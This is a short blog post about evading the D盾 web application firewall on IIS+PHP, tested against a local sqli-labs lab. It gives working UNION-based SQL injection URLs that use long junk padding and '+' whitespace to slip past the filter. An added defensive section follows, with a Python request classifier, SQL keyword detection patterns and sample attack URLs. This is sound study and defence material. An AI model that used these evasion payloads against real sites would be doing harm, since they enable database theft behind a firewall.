An Abstract Person's Little Site

# BYPASS (D盾) IIS+PHP


The environment is IIS + PHP 5.4 + MySQL + D盾.
Testing is done against sql-labs.

1.png

A single quote is blocked outright.

2.png

Prepending junk characters gets past the block.

3.png

Bypass with UNION injection

http://192.168.79.131/Less-1/?id=-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%27+union+select+1,2,3--+

http://192.168.79.131/Less-1/?id=-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%27+union+select+1,2,3 from information_schema.tables where `table_schema` like database()--+

http://192.168.79.131/Less-1/?id=-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%27+union+select+1,2,3 from+information_schema.tables where+`table_schema` = database()--+

4.png

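To be honest, I don't quite understand why the + sign gets through either. My guess is that it is down to IIS + PHP (some PHP quirk??).
The idea behind bypassing D盾 is actually very simple: find a MySQL whitespace character that its matching does not cover.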

Bypass with error-based injection

5.png

It is all much the same.
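From the defending side, the requests above stop standing out once the `id` parameter is checked against a strict allow-list and any pattern matching runs on the value as the backend will see it (URL-decoded, `+` turned into a space, padding and whitespace collapsed). The following is an added example, not code from the original post or from D盾; the host name, the length limit and the token list are assumptions, and the sample URLs are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

MAX_ID_LEN = 10  # assumed upper bound for a legitimate numeric id
# Tokens taken from the requests shown on this page (assumed, not a complete rule set).
SQL_TOKENS = re.compile(r"union select|information_schema|database ?\(")

def normalize(value: str) -> str:
    """Reduce a decoded parameter to a canonical form before matching."""
    value = value.lower().replace("`", "")      # backtick quoting does not change the identifier
    value = re.sub(r"(.)\1{7,}", r"\1", value)  # collapse long runs of one repeated character
    return re.sub(r"\s+", " ", value).strip()   # any whitespace run becomes a single space

def classify(url: str, param: str = "id") -> set:
    """Return the reasons a request is suspicious; an empty set means clean."""
    reasons = set()
    # parse_qsl decodes %27 and turns '+' into a space, as PHP does for $_GET.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name != param:
            continue
        if not re.fullmatch(r"[0-9]{1,10}", value):  # allow-list: digits only
            reasons.add("not_integer")
        if len(value) > MAX_ID_LEN:
            reasons.add("overlong")
        if SQL_TOKENS.search(normalize(value)):
            reasons.add("sql_keywords")
    return reasons

# Constructed sample requests (hypothetical host, not real log data).
PAD = "a" * 120
SAMPLES = [
    "http://app.example/Less-1/?id=7",
    "http://app.example/Less-1/?id=1%27",
    "http://app.example/Less-1/?id=-1" + PAD + "%27+union+select+1,2,3--+",
    "http://app.example/Less-1/?id=-1" + PAD
    + "%27+union+select+1,2,3 from+information_schema.tables"
    + " where+`table_schema` = database()--+",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(sorted(classify(url)) or "clean", url[:48])
```

The allow-list check alone rejects every request shown on this page, whatever padding or whitespace variant is used; the durable fix in the application is a parameterized query for `id`.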
